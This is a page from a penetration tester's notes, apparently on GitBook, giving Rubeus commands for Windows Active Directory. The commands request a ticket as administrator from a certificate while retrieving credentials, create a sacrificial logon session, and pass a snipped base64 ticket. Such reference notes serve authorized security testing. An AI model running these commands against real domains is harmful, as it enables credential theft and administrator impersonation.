Dado1513
  • Dado1513 Pentest Notes
  • Introduction & Documentation
  • Pentesting Methodologies
  • External Recon Pentesting
  • Brute Force
  • LotL - Living off the Land
  • Pivoting Tunnelling and Port Forward
  • Active Directory
    • 🛠️Active Directory Enumeration & Attacks
    • 🛠️ACL/ACE Abuse
    • 🛠️ADCS
    • Kerberos Attack Cheatsheet
    • 🛠️Trust Attacks
  • Linux Pentesting
    • Linux Privilege Escalation
  • Windows Pentesting
    • Windows Privilege Escalation
  • Mobile Pentesting
    • 🛠️Android Application Pentesting
    • 🛠️iOS Application Pentesting
  • Cloud Pentest
    • 🛠️Cloud Pentesting
  • Wireless Pentesting
    • 🛠️WiFi Pentesting
  • Web Pentesting
    • 🛠️XSS Cheatsheet
    • 🛠️SQL Injection
  • OSINT
    • Google Dorks
  • Network Services Pentest
    • Attacking Common Services
    • 🛠️139,445 SMB
    • 🛠️161,162,10161,10162- Pentesting SNMP
    • 🛠️winrm
  • Tools
    • NetExec
    • chisel
    • bloodyAD
    • PowerView
    • certipy
    • sqlmap
    • mimikatz
    • mSFVenom Cheatsheet
    • Ligolo-ng
    • Rubeus
    • ldapsearch
Powered by GitBook
On this page
  1. Tools

Rubeus

Authenticate in windows

PS C:\Tools> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap

Certificate Authentication

PS C:\Tools> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap

Create a Sacrificial Logon Session with Rubeus

PS C:\Tools> .\Rubeus.exe createnetonly /program:powershell.exe /show

Import Base64 Ticketin into the Powershell session using Rubeus

PS C:\Tools> .\Rubeus.exe ptt /ticket:doIGQjCCBj6gAwIBBaEDAgEW<SNIP>
PreviousLigolo-ngNextldapsearch

Last updated 27 days ago